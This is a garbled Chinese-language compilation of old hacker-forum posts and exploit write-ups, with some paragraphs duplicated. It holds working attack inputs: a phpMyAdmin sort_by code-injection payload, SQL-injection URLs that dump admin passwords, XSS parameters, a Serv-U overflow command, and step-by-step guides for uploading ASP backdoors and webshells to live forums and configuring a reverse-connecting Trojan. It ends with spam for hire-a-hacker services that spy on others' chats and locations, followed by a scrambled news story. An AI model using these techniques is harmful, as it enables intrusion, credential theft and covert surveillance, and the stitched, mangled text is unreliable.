都会引起安全问题。例如，ExecCGI选项，是选择是否允许CGI程序运行，CGI程序很不安全，所以，能不用执行CGI程序，就尽量不执行。还有别的选项会有不同的问题，安装时要注意。目前Apache除了提供基本类型认证，还支持使用MD5的基于摘要的加密认证。

　　漏洞发现者：懒人 *** :76523046漏洞描述自从我上次发现新浪网免费点歌的一个小小漏洞，并利用此漏洞做了个免费短信发送软件后，新浪网对此漏洞做了一定的修复，不过一些问题依然是存在的。虽然新浪加了验证码看似堵上了漏洞，可是本地提交并修改数据却还是没有很好的解决，只在短信服务器简单判断一下！所以这个免费发短信的漏洞依然没有解决！我们还是有机会免费发短信的，我现已做出了利用此漏洞的相关工具。此漏洞我以向新浪网反馈，相信很快会对此漏洞做出修复的。示例：此代码是基于新浪免费点歌发送页面修改得来的，内容如下： 新浪短信免费点歌服务漏洞测试

　　文章作者：SpyHat The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross SiteScripting, which will allow the attacker to modify the post in the guestbook. Theaffected scripts is admin.cgi URL: ((yourdomain).com/(yourcgidir)/admin.cgi) I have tested the script with the following query: action=modifypost&entryid="> I have also tested the script with theses POST variables: action=modifypost&entryid=66&password= action=modifypost&entryid=66&password='> action=modifypost&entryid=66&password="> action=modifypost&entryid=66&password=> action=modifypost&entryid=66&password=

　　漏洞发现者：懒人 *** :76523046漏洞描述自从我上次发现新浪网免费点歌的一个小小漏洞，并利用此漏洞做了个免费短信发送软件后，新浪网对此漏洞做了一定的修复，不过一些问题依然是存在的。虽然新浪加了验证码看似堵上了漏洞，可是本地提交并修改数据却还是没有很好的解决，只在短信服务器简单判断一下！所以这个免费发短信的漏洞依然没有解决！我们还是有机会免费发短信的，我现已做出了利用此漏洞的相关工具。此漏洞我以向新浪网反馈，相信很快会对此漏洞做出修复的。示例：此代码是基于新浪免费点歌发送页面修改得来的，内容如下： 新浪短信免费点歌服务漏洞测试

p　　受影响系统：Microsoft DebugView 4.64 不受影响系统：Microsoft DebugView 4.72 描述： CVE(CAN) ID: CVE-2007-4223 DebugView允许用户监控本地系统或可通过TCP/IP访问的 *** 中计算机上的调试输出。 DebugView所加载的Dbgv.sys内核模块中的功能可能允许将用户提供的数据拷贝到内核中可控的地址，这样恶意用户就可以向运行的内核中注入任意代码。 如果要利用这个漏洞，管理员必须加载DebugView，这样才会将Dbgv.sys驱动加载到内核，然后所有用户在系统重启之前都可以访问有漏洞的内核模块。 厂商补丁： 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： /p p　　这是一个可以让黑客欣喜若狂的新漏洞，一旦该漏洞被激活，就会有大量计算机成为黑客手中的肉鸡，被人远程控制不可避免…… 　　微软的Windows操作系统在进行了短暂的“喘息”后，近日又在攻击爱好者不懈努力下，被成功找出几个高危的系统安全漏洞，而Microsoft Windows MSHTA脚本执行漏洞就是其中的重要一员。 　　安全公告牌 　　MSHTA即HTA，此处的MS主要用于强调这是微软的漏洞，HTA全名为HTML Application，就是HTML应用程序，其实只要简单地用“hta”为扩展名保存HTML页面就算创建了一个HTA文件。以前就有很多恶意代码利用它，但是随着用户安全意识的提高，以及安全厂商将它列入黑名单，这些含有HTA代码的文件发挥的破坏作用已大不如前了。然而，Windows MSHTA脚本执行漏洞的出现，使得潘多拉的魔盒再次开启，噩梦开始…… 　　攻击者可利用此漏洞控制受影响的系统，进行恶意程序的安装、系统文件的管理等，或创建一个拥有完全控制权限的管理员账号。 　　原理 　　Microsoft HTML Application Host(MSHTA)是Microsoft Windows操作系统的一部分，必须使用它才能执行HTA文件。而Windows Shell中存在远程代码执行漏洞，起因就是系统不能正确识别文件的关联程序。 　　其实说简单一点就是Windows系统在处理文件关联程序的时候出现了问题。例如，用户本来想用Winamp打开一个文件后缀为“mp3”的文件，但却没能正确调用Winamp程序而调用了另一个程序打开了这个“mp3”文件。这个漏洞就是这样，用户运行恶意文件后，系统会调用MSHTA打开这个文件，如果这个文件中包含有HTA代码，那么系统就会立刻执行这段代码，从而引发各种安全问题。 　　配置木马服务端 　　攻击者想要成功利用该漏洞进行远程控制的话，首先就得配置一个木马的服务端程序。通过木马程序，就可在图形化的状态下进行远程控制，这样操作起来更加简单方便。 　　当我们成功激活被攻击计算机上的Windows MSHTA脚本执行漏洞后，该计算机就会自动下载我们设置的服务端程序，我们即可对它进行远程控制操作。 　　今天，我们可以采用的木马是最新的国产木马“流萤”，在它的帮助下，我们可以非常方便地通过客户端中的各个按钮进行远程控制。 　　运行流萤木马的客户端程序，在弹出的操作界面中点击工具栏上的“配置服务端”按钮。在弹出的“配置服务端”窗口中，就可开始配置我们的服务端程序(见图)。 javascript:if(this.Width＞500)this.width=500" border=0 　　由于木马“流萤”采用了流行的反弹连接技术，所以要在“DNS域名”中设置用于服务端程序反弹连接的IP地址，也就是本地计算机当前的IP地址。当然，攻击者也可采用其他木马进行反弹连接的操作。 　　在“连接端口”中设置用于服务端程序和客户端(即被攻击的计算机和进行攻击的计算机)进行数据传输的监听端口。“辨识密码”就是服务端程序在上线时的确认密码，如果辨识密码不正确，攻击者将不能对被攻击计算机进行控制。 　　“流萤”在服务端的隐藏方式上采用了现在流行的线程插入的 *** ，选中“是否生成dll进程插入类型”选项后，用户可根据自己的需要，选择将生成的服务端程序进程插入到资源管理器程序explorer.exe的进程中或IE浏览器的IEXPLORE.EXE进程中实施服务端隐藏。这样不但可以轻松穿透大多数个人防火墙，而且在进程管理器中也无法查到该进程。 　　现在，所有的设置已经完成，最后点击“生成”按钮就可生成我们/p p　　发布日期：2008-09-15更新日期：2008-09-17 受影响系统： phpMyAdmin phpMyAdmin 2.11.9.1 不受影响系统： phpMyAdmin phpMyAdmin 2.11.9.1 描述：BUGTRAQ ID: 31188 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入，远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。 测试 *** ： 警 告 以下程序( *** )可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！"]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] 建议：厂商补丁： phpMyAdmin----------目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： from:/p p　　关于新云 新云 *** 成立于2002年,是一家提供现代 *** 服务、软件开发的 *** 公司，主要从事 *** 应用软件开发、电子商务系统开发，程序订制、网站开发、网站策划、域名注册、空间租用等多项业务，为企业打造卓越的 *** 应用平台。 漏洞原理 利用各种 *** 实现入侵，如COOKIES、抓包、注入检测等。 1.过滤未全 user\articlepost.asp 文件第333行 Quote SQL="select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And username=’" & Newasp.MemberName & "’ And ArticleID=" & Request("ArticleID") 没有任何过滤，只有用户是否有权限发文章的检查。综合代码原理可构造URL语句： articlepost.aspChannelID=1&action=view&ArticleID=1%20union%20select%201,2,3,4,5,username,password,8,9%20from%20nc_admin 注册后直接在浏览器上输入，就可以爆出管理员的表和代码。 2.新云2.1SQL版注入漏洞 漏洞描述： 动画频道的“动画管理”和“审核管理”，错误类型： Quote Microsoft OLE DB Provider for SQL Server (0x80040E14) 未能找到存储过程 ’NC_FlashAdminList’。 /admin/admin_Flash.asp, 第 233 行 可以利用SQL注入 *** ，手工&工具，这个就不用我教了吧。如: articlepost.aspChannelID=1&action=view&ArticleID=1;-- 3.COOKIES欺骗获取管理账号 攻击者只需使用WSockExpert等工具抓包修改资料时的信息，编辑用户名及ID信息后用NC提交即可修改指定的用户信息。/p p　　文/ 勇哥(看完我真是无话可说,for 6.0的漏洞,我真@#@$%$#^&^*&.....) 前一阵动网Upfile.asp文件漏洞真可谓影响深远。把空格（ASC为20H）改成为空（ASC为00H）也就是符串结束符“\0”来成功欺骗计算机，这种提交数据的方式使我深受启发，由此才有此文：乔客6.0的Upload.asp漏洞。同时，也把本篇文章作为的一件更好的生日礼物，献给我最漂亮、最善解人意的女朋友俊俊！ 漏洞危害：　　1．用户可以随意建目录。 2．用户可以上传任意后缀名的文件。 下面先来看一下在Upload.asp文件中存在的如下代码：if not MyFso.folderExists(up_path) then set up_path=MyFso.CreateFolder(up_path)end if如果上传目录不存在，会自动创建，这样我们就可以随便建目录了。再看：upfile_name=up_name&"."&upfile_name upfile.SaveAs up_path&upfile_name可见上传后文件名是：“upfile_name=up_name&"."&upfile_name”，其中Up_name由年、月、日和一个随机数组成，如：2004610173526，而“.”后面的Upfile_name为合法的后缀名，如GIF，本来这是很正常的改名方式，但是计算机在检测字符串时是看是否碰到“\0”字符，如果是，则认为字符串结束了。也就是说我们在构造上传文件名时，只要欺骗计算机，把“2004610173526”文件名改成“2004610173526.asp\0”这样的方式，后面一连串的时间字符我们都可以不要了，从而达到直接将文件名保存为我们定义的文件名的目的。原理是枯燥的，实例才最有趣，下面给大家讲一个详细的利用这个漏洞入侵某论坛的例子。 漏洞利用： 首先在百度里搜索关键字“版本：Joekoe V6.0”，然后会出现好多这样的论坛，我们随便挑一个论坛去注册，然后再打开论坛的任意一个版块如“笑话天地”（点击左上角的“发表新贴”按钮（发新帖子。 上面的准备工作做完后，下面我们就可以正式开始挑战这个论坛了。需要用到的工具有WinSock Expert V0.6 beta 1、UltraEdit、NC、ASP后门和新鲜鸡蛋几只，均可在光盘中找到（咳，鸡蛋是给大家吃的，可别用来扔我，呵呵）。下面我们正式开始：　　运行WinSock Expert->点“open process”按钮->打开IExplore.exe进程，选中第二步打开的网页（某某论坛-笑话开地，发表新贴）->点“open”按钮，这样WinSock Expert就可以监听刚才打开的网页的一举一动了。我们的目的是想要抓取数据上传的包并做进一步的修改。　　然后使用“上传文件”这一功能，浏览上传我们的ASP后门。我用的是“冰狐浪子微型ASP后门”，成功后再配合“海阳顶端2004”一起发挥作用，效果还不错，大家可以考虑这种配合方式。点击“上传”后，页面会出现“上传失败：文件类型只能为gif、jpg、bmp、swf、rar、zip等格式，返回上一页”，不用理会它，现在我们需要的就是这样的信息。　　赶紧到WinSock Expert中提取抓获的有用数据，内容如下：POST /bbs/upload.aspaction=upfile HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*Referer: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7d311f101009cAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: 710Connection: Keep-AliveCache-Control: no-cacheCookie: joekoe%5Fonline=onlines=1&login%5Fpassword=fb411be97b3b0d48&guest%5Fname=&iscookies=yes&login%5Fusername=test; ASPSESSIONIDAS *** AATR=CNBCLACDOHPJIDDNHLCCICLP -----------------------------7d311f101009cContent-Disposition: form-data; name="up_path" forum-----------------------------7d311f101009cContent-Disposition: form-data; name="up_name" 200473153438----------------

　　受影响系统：Microsoft DebugView 4.64 不受影响系统：Microsoft DebugView 4.72 描述： CVE(CAN) ID: CVE-2007-4223 DebugView允许用户监控本地系统或可通过TCP/IP访问的 *** 中计算机上的调试输出。 DebugView所加载的Dbgv.sys内核模块中的功能可能允许将用户提供的数据拷贝到内核中可控的地址，这样恶意用户就可以向运行的内核中注入任意代码。 如果要利用这个漏洞，管理员必须加载DebugView，这样才会将Dbgv.sys驱动加载到内核，然后所有用户在系统重启之前都可以访问有漏洞的内核模块。 厂商补丁： 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

　　飘雪 一剑西来：以后找洞又多了一个可以考虑的思路，下载数据库，呵呵，当然是你能下载。然后查这个表，如果这时新论坛，或者管理员从来不清空日志，那你发了。 昨天下到了xx论坛的数据库，又是动网，其中管理员密码被MD5加密过了。看了一下，数据库文件中存在一个叫DV_log的表，记录管理员在后台的所有操作。搜索一下pass，找到了几条原始管理员admin修改密码的操作，还有一个添加新管理员的操作，密码竟然明文记录在里面，这样看来，数据库中的所有加密已经是形同虚设了。我发现我手头的这个是七八月份的动网，现在的动网是不是有这个隐患就不清楚了。 一剑西来：我查了bbs.7747.net.几千条日志，没有找不到pass这四个字母。可能只有修改密码的时候才行吧。 大家不妨试验一下，如果您有结果，请告诉我，非常感谢。

　　发布日期：2004-02-26更新日期：2004-02-27受影响系统： RhinoSoft Serv-U 5.0RhinoSoft Serv-U 4.xRhinoSoft Serv-U 3.xRhinoSoft Serv-U 2.x不受影响系统： RhinoSoft Serv-U 5.0.0.4描述： Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。Serv-U在处理"MDTM"命令的参数时缺少正确的缓冲区边界检查，远程攻击者可以利用这个漏洞对FTP服务程序进行缓冲区溢出攻击，可能以FTP进程权限在系统上执行任意指令。Serv-U提供FTP命令"MDTM"用于用户更改文件时间，当用户成功登录系统，并发送畸形超长的时区数据作为命令参数，可触发缓冲区溢出，精心构建参数数据可能以FTP进程权限在系统上执行任意指令。利用此漏洞需要用户拥有合法帐户登录到系统，但不需要写及其他权限。测试 *** ： 警 告以下程序( *** )可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！bkbll （）提供了如下的测试 *** ：用合法的帐户登录进服务器以后，执行如下命令：MDTM 20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /test.txt建议： 厂商补丁：RhinoSoft---------目前厂商已经在最新版本的软件中修复了这个安全问题，请到厂商的主页下载

　　orgby:philoes ------------------------------------------------- 在黑暗天堂上看到HAK_BaN发现南方数据企业网站管理系统 V4.0有SQL注入（得到的是MD5加密以及后台可以利用数据库备份功 能得到webshell的漏洞，于是下载下来看了看，的确存在。不过我在分析它的漏洞的时候，发现了它的致命漏洞。今天就拿来和大 家一起分享!在此感谢rain以及HAK_BaN以及HAK_BaN群上的朋友。 先看看它的首页 首先说说它的注入漏洞，我随便点了几个有ID地址，妈的，手工试了一下，果然可以注如入 如： 别的我就不找了。因为是ACCESS的数据库，我就不详细说注入过程了，不明白的可以参考我的另一篇文章---SQL injection with ACCESS(手动篇)，强烈建议对手工注入还不是很熟悉的朋友结合SQL injection with ACCESS(手动篇)这篇文章，对该系统进行手 工注入。拿到加密了的密码后，当然是破解了啊，如果成功的话到后台利用数据库备份功能就可以得到webshell。当然有这个漏洞， 这个系统在很大程度来说就已经可以搞定了，我想HAK_BIN可能就是因为这点就没有去看别的漏洞。 现在我们来重点的，也就是我所说的致命漏洞，哈哈，还是上传漏洞。系统文件中有三个上传文件，文件的大致代码和动力文章的上传 文件代码相似，但我看之一个Upfile.asp上传文件时，里面加了一句 if session("AdminName")="" then response.Write("请登录后再使用本功能！") 也就是说，只有管理员才能用该功能，当时我在想有没有 *** 突破它，不过至少我没有 *** ，如果你有的，别忘了告诉我。 于是看看上传图片的文件Upfile_Photo.asp，和上面一样没发利用。抱着一线希望看了一下最后一个上传文件upfile_Other.asp 真走运，看到了 if session("AdminName")="" and session("UserName")="" then response.Write("请登录后再使用本功能！") 哈哈，漏洞存在，马上试试。 1:首先先注册一个用户：philoes 2:用注册的用户登陆，到处找上传的地方，但没找到，但我清楚不会影响我们利用该上传漏洞，哈哈。(但后来想想 ，这里可能是作者的一点粗心，它只要吧and session("UserName")="" then去掉，我是没法利用的)。 3:打开利用代码加上提交地址。 利用代码如下： [NextPage] 前面用一个gif文件，后面加以cer为后缀的asp木马，点提交，就可以看到木马的地址了哦，哈哈 ，是不是很兴奋啊! 4:当然是看看木马了，

　　受影响系统：Mozilla Firefox <%"

　　每当生活遇到一些事情的时候，可能会遇到需要查对方的微信记录，或者是需要查对方的位置，那么对于这样的情况总会让自己措手不及，所以就需要找黑客的帮忙，让他们来帮助自己查询相关的事情。1.专业黑客接单。现如今网上有很多这样的黑客，但是专业与否可能无法判断，所以这就需要在选择黑客的时候一定要谨慎，一定能够确定他们是可以真正帮助到自己的，同时也能够准确做事的。

　　2.靠谱黑客接单平台。如果能够确定这个黑客是靠谱的，那么首先他的做事风格一定是先做事后付款，并且他做起事来也是比较迅速的，能够真正的帮助自己查询到想要的内容。如果自己满意，那么可以直接付款，当然他们都会有自己的网站，直接在网站上联系即可，他们会直接回复相关事情。

　　3.24小时接单的黑客。这样的黑客都是24小时接单的，因为很多人他们找人特别着急，可能是在凌晨或者是更晚的时间。对于这样的情况，如果想要随时随地都找到黑客的话，那么可以直接在网上联系他们，他们当然能够接到这样的单子。所以在遇到事情的时候也不要病急乱投医，一定要找到比较靠谱的黑客，他们才能够真正的帮助自己解决问题才能够，解决自己目前的困境，让自己可以轻易的摆脱现在的难事。

　　相关文章：

　　专业接单黑客联系方式

　　24小时接单的黑客联系方式

　　一群以80后、90后为主体的秘密黑客入侵了70多个 *** 人事网站，举行不法链接，让办假证的人能够盘问证号，从业务中赢利。9月3日，一个在网上从事制售假证件的犯法团伙在广东揭阳开庭审理。十三名被告各被判处一年六个月和七年。

　　专业接单黑客联系方式

　　2011年12月8日，揭阳市人力资源和社会保证局人事测验中间办公室主任徐伟鹏在该局“揭阳市人事测验网”的按期保护搜检中发掘非常环境。该网站宣布栏中的2008年职业技术职员资历栏信息被薪金点窜并链接到违规网页，用户一点击就会跳出“职业天资考核”的窗口。

　　“咱们的网站从未开明过盘问核实功效，质疑有人植入计算机病毒公布失实信息.”曾经发掘少许考生受骗了。徐伟鹏登时向警方报案，一路重磅案件渐渐浮出水面。

　　据打听，此案由公安部挂牌督办，公安部在天下密集警力。停止20197月，共摧毁制假售假、黑客作案窝点118个，抓获犯法质疑人165人，收缴假证12万余张、假图章1万余枚。据不彻底统计，天下公有180余家 *** 人事网站遭到黑客攻打，300多万条片面隐衷关联数据被盗卖，3万余人解决各种失实数据，涉案金额3亿余元。

　　使人惊奇的是，受审的13名“黑客”大多是80年月出身的，惟有初中和高中文明。非常小的徐海滨出身于1993年。他们是奈何歧路亡羊的？为何 *** 机构的网站云云“软弱”，让“黑客”置之不理？

　　24岁的“在线”

　　13名被告人中，有特地卖力入侵网站的黑客，有制售假证照的证照经销商，专业接单黑客联系方式(先办事后付款黑客联系方式）也有卖力网页证照信息的藏书楼员。它们划分有差别的上线和下线，造成了互相接洽、比较自力的邃密产销网页。24岁的罗邦杰是各级顶尖奸细之一。

　　2010年下半年，被告人罗庞杰首先为别人供应网上盘问捏造职业技术资历证书。罗庞杰经历腾讯 *** 与被告人杨忠来、徐海滨获得接洽，并划分支出他们在美国和香港租用服务器空间的价格。

　　杨中来是罗邦杰的下线。他卖力编写盘问窗口的ASP法式，并凭据需求建立数据库。罗邦杰放置杨忠来、徐海滨入侵列国 *** 人事网站。入侵胜利后，在指定的链接上挂起一个盘问窗口，单击该盘问窗口会主动链接到其数据库。

　　而被告人陈晓明则是罗邦杰的认证经销人。罗庞杰经历腾讯 *** 或邮件接洽陈晓明，网页陈晓明供应假职业技术证书的职员信息，并凭据解决的假证数目收取陈晓明150元至200元/份不等的价格。

　　一旦将解决假证职员的信息增加到杨某、徐某建立的数据库中，解决假证职员点击 *** 人事网站网页上的盘问窗口即可胜利盘问关联信息。

　　罗庞杰注释说，客户端平时表面见知认证网站，客户端登录后输入姓名、身份证号、证号等信息。偶然，在线认证的 *** 网站地点和关联法式会印在证书上。但是，客户在网站上看到的认证信息，要么是黑客入侵网站后不法增加的“不合法”数据库，要么是黑客歹意窜改 *** 数据库中的别人信息。

　　据统计，罗庞杰让杨忠来、徐海滨胜利入侵了重庆市人力资源和社会保证办公室、内蒙古自称等50余家网站。